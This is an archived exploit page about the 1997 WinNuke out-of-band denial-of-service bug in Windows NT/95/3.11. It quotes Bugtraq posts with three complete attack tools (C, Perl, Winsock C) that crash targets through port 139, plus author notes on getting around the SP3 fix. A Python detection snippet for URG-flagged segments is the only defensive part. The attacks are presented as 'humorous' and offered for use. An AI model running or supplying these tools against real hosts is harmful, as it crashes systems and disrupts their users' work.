Windows NT/95/3.11 Out Of Band (OOB) data barf

Summary
Description: Windows NT will completely crash if you send Out of Band (MSG_OOB) data to its port 139. Win95 will blue screen and network connectivity is usually lost; applications may crash. Win 3.11 with the M$ TCP/IP stack crashes too. Other ports like MS DNS may also be affected.
Author: myst <myst@LIGHT-HOUSE.NET>
Compromise: Stupid DOS attack, but it can be humorous.
Vulnerable Systems: WinNT 4.0, 3.51, Win95, WFWG 3.11
Date: 9 May 1997
Notes: I'm also appending the perl exploit code and the visual basic code. The M$ FIX in service pack 3 and the Hotfix do NOT work! You just have to change the code a bit, or use the Macintosh exploit. Change the TCP Urgent pointer if you want to exploit the post-Service Pack 3 condition from a UNIX box.
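An added detection-side example (not from Fyodor's page or any of the quoted posts): it parses raw IPv4/TCP bytes and flags segments to port 139 that carry the URG bit with a non-zero urgent pointer, which is what a MSG_OOB send produces on the wire. The packet builder, the 192.0.2.x addresses and the two sample packets are constructed test data.

```python
import struct
from typing import NamedTuple, Optional

TCP_URG = 0x20          # URG bit in the TCP flags field
NETBIOS_SSN_PORT = 139  # NetBIOS session service, the port the posts target

class TcpSegment(NamedTuple):
    src_port: int
    dst_port: int
    flags: int
    urgent_ptr: int
    payload: bytes

def parse_ipv4_tcp(packet: bytes) -> Optional[TcpSegment]:
    """Parse a raw IPv4 packet; return its TCP segment, or None if it is not TCP."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    if packet[9] != 6 or total_len > len(packet) or total_len < ihl + 20:
        return None
    tcp = packet[ihl:total_len]
    src, dst, _seq, _ack, off_flags, _win, _csum, urg = struct.unpack("!HHIIHHHH", tcp[:20])
    data_off = (off_flags >> 12) * 4
    return TcpSegment(src, dst, off_flags & 0x3F, urg, tcp[data_off:])

def is_oob_to_netbios(seg: TcpSegment) -> bool:
    """How a MSG_OOB send to TCP/139 looks on the wire: URG set with a non-zero
    urgent pointer. The NetBIOS session service itself never uses urgent data."""
    return (seg.dst_port == NETBIOS_SSN_PORT
            and bool(seg.flags & TCP_URG)
            and seg.urgent_ptr > 0)

def scan(packets) -> list:
    """Indexes of the packets that match the OOB-to-139 pattern."""
    return [i for i, p in enumerate(packets)
            if (seg := parse_ipv4_tcp(p)) is not None and is_oob_to_netbios(seg)]

def build_ipv4_tcp(dst_port: int, flags: int, urgent_ptr: int, payload: bytes) -> bytes:
    """Constructed sample packet for exercising the parser (checksums left at zero)."""
    tcp = struct.pack("!HHIIHHHH", 40000, dst_port, 1, 1, (5 << 12) | flags, 8192, 0, urgent_ptr)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0, 64, 6, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    return ip + tcp + payload

# Constructed samples: a WinNuke-style segment (PSH|ACK|URG, urgent pointer at the end
# of "Bye") and an ordinary NetBIOS session request (PSH|ACK, no urgent data).
SAMPLE_OOB = build_ipv4_tcp(139, 0x38, 3, b"Bye")
SAMPLE_NORMAL = build_ipv4_tcp(139, 0x18, 0, b"\x81\x00\x00\x44")
```

Fed a capture, `scan()` returns only the segments that match; a post-SP3 variant with a shifted urgent pointer still sets URG, so the rule keys on the flag rather than on the pointer value.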
Details


Date: Fri, 9 May 1997 22:11:55 -0400
From: myst <myst@LIGHT-HOUSE.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows 95/NT DoS

Hello,

        It is possible to remotely cause denial of service to any windows
95/NT user.  It is done by sending OOB [Out Of Band] data to an
established connection you have with a windows user.  NetBIOS [139] seems
to be the most effective since this is a part of windows.  Apparently
windows doesn't know how to handle OOB, so it panics and crazy things
happen.  I have heard reports of everything from windows dropping carrier
to the entire screen turning white.  Windows also sometimes has trouble
handling anything on a network at all after an attack like this.  A
reboot fixes whatever damage this causes.  Code follows.


_eci



--- CUT HERE ---

/* winnuke.c - (05/07/97)  By _eci  */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

#include <stdio.h>
#include <stdlib.h>      /* exit() */
#include <string.h>
#include <strings.h>     /* bzero(), bcopy() */
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139  /* Attack port: 139 is what we want */

int s;
char *str = "Bye";  /* Makes no diff */

/* Resolve server (hostname or dotted quad) and connect sock to it on port.
 * Returns 0 on success, a negative value on failure. */
int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;

     bzero((char *)&blah, sizeof(blah));
     blah.sin_family = AF_INET;
     blah.sin_port = htons(port);

     if ((he = gethostbyname(server)) != NULL) {
         bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
     }
     else {
         /* inet_addr() returns INADDR_NONE on a bad address; s_addr is
          * unsigned, so the original "< 0" test could never be true */
         if ((blah.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) {
             perror("gethostbyname()");
             return(-3);
         }
     }

     if (connect(sock, (struct sockaddr *)&blah, sizeof(blah)) == -1) {
         perror("connect()");
         close(sock);
         return(-4);
     }
     printf("Connected to [%s:%d].\n", server, port);
     return 0;
}

int main(int argc, char *argv[]) {

     if (argc != 2) {
         printf("Usage: %s <target>\n", argv[0]);
         exit(0);
     }

     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
         perror("socket()");
         exit(-1);
     }

     /* The original ignored the result and would send on an unconnected socket */
     if (open_sock(s, argv[1], dport) < 0)
         exit(-1);

     printf("Sending crash... ");
     /* MSG_OOB makes the stack set URG and the urgent pointer on this segment */
     send(s, str, strlen(str), MSG_OOB);
     usleep(100000);
     printf("Done!\n");
     close(s);
     return 0;
}
Date: Sun, 11 May 1997 16:49:16 -0700
From: Ghent <ghent@BOUNTY-HUNTERS.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: more DoS fun

Here is a perl version if anyone wants to play with it.

------
#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);

# port defaults to 139; the original only set $p when no port was given
$h = $ARGV[0]; $p = $ARGV[1] || 139;
if (!$h) { die "A hostname must be provided. Ex: www.microsoft.com\n"; }

$in_addr = (gethostbyname($h))[4] or die "Cannot resolve $h\n";
$addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;

print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;
------

- Ghent
Date: Sun, 11 May 1997 15:03:36 +0400
From: Eugene Surovegin <ebs@GLASNET.RU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows port of OOB attack code

Hello,

Here is a Windows port of original winnuke.c by _eci. I compiled it with MS
Visual C++ 4.2b.
I added one additional parameter - <port>.
Now you can call
        >winnuke.exe www.microsoft.com 135

It looks like only port 139 is vulnerable (but who knows...)

--- CUT HERE ---

/* winnuke.c - (05/07/97)  By _eci  */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

// Windows NT port by Eugene Surovegin <ebs@glasnet.ru>
// Compiled with MS Visual C++ 4.2b, tested on NT 4.0 SP2

#include <stdio.h>
#include <stdlib.h>   /* atoi(), exit() */
#include <string.h>
#include <sys/types.h>
#include <winsock.h>

#define dport 139  /* Attack port: 139 is what we want */

/* Resolve server (hostname or dotted quad) and connect sock to it on port.
 * Returns 0 on success, a negative value on failure. */
int open_sock(SOCKET sock, char *server, int port) {

  struct sockaddr_in blah;
  struct hostent *he;

  memset((char *)&blah,0,sizeof(blah));
  blah.sin_family=AF_INET;
  blah.sin_port=htons(port);

  if ((he = gethostbyname(server)) != NULL)
    memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
  else
    if ((blah.sin_addr.s_addr = inet_addr(server))==INADDR_NONE) {
      puts("Cannot resolve host");
      return(-3);
    }

  /* The original wrote "if (res=connect(...)==-1)", which stores the result
   * of the comparison in res rather than the return value of connect() */
  if (connect(sock,(struct sockaddr *)&blah,sizeof(blah))==SOCKET_ERROR) {
    puts("Cannot connect socket");
    return(-4);
  }
  printf("Connected to [%s:%d].\n",server,port);
  return 0;
}


int main(int argc, char *argv[]) {

  SOCKET  s;
  char    *str = "Bye";  /* Makes no diff */
  int     port=0;
  WSADATA wsaData;   /* declared up front: C wants declarations before statements */

  if ( (argc<2) || (argc>3)) {
    printf("Usage: %s <target> [<port>]\n",argv[0]);
    exit(0);
  }

  if (argc==3) port=atoi(argv[2]);
  if (!port) port=dport;

  if (!WSAStartup(MAKEWORD(1, 1), &wsaData)){
    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))!=INVALID_SOCKET) {
      if (!open_sock(s,argv[1],port)){
        puts("Sending crash... ");
        send(s,str,strlen(str),MSG_OOB);
        puts("Done!");
      }
      else printf("Error connecting to host %s\n",argv[1]);
      closesocket(s);
    }
    else puts("Error getting socket");
    WSACleanup();
  }
  else puts("Cannot init Winsock");
  return 0;
}

--- CUT HERE ---

                                Eugene Surovegin <ebs@glasnet.ru>

This page is part of Fyodor's exploit world.